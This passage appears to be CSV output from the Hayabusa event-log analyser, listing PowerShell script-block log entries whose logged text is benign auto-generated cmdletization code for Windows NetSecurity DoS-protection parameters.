${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuth",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmd,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmd,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 